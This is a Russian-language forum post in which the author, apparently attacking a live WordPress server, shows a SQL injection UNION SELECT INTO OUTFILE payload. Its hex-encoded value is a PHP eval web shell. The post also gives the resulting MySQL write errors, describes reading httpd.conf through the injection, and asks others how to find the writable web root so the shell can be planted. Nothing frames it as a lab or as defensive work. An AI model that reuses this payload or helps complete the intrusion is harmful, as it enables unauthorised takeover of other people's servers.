Can't create/write to file '/home/httpd/html/site/shared/wp/live/wp-content/vvvvv.php' (Errcode: 2)


Супервозмущение

Но я не отчаивался и шёл!

Дошёл до

2.


+union+select+1,2,3,0x273c203f706870206576616c2824 5f524551554553545b636d645d293b203f3e27,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+from+mysql.user+in to+outfile+'/home/httpd/html/'--
File '/home/httpd/html/' already exists


И вот, я кажется дошёл. Но тут подвох - я перепробовал все возможные комбинации и даже очень опасную, однако даже она дала сбой

Can't create/write to file '/home/httpd/html/huipizdamatreshka/' (Errcode: 21)

Если подставлять вместо опасного запроса, запрос вида: into+outfile+'/home/httpd/html/site/1.txt'-- , либо любой другой, то получаю ошибку Errcode: 2 , т.е. нет директории site.

Читал на форумах, что в случае, если адрес не известен, то читаем файл httpd.conf (прочитал его по /etc/httpd/conf/httpd.conf ).

Нашёл в нём: DocumentRoot "/var/www/html" и всё равно провалился. Чтобы не делал - результат один Errcode 2, 13, 21

Есть ли у кого-нибудь, какие-нибудь предположение или догадки, как найти полный путь до папки? Кстати, нет-нет, но закачал файл в /tmp/ . Результат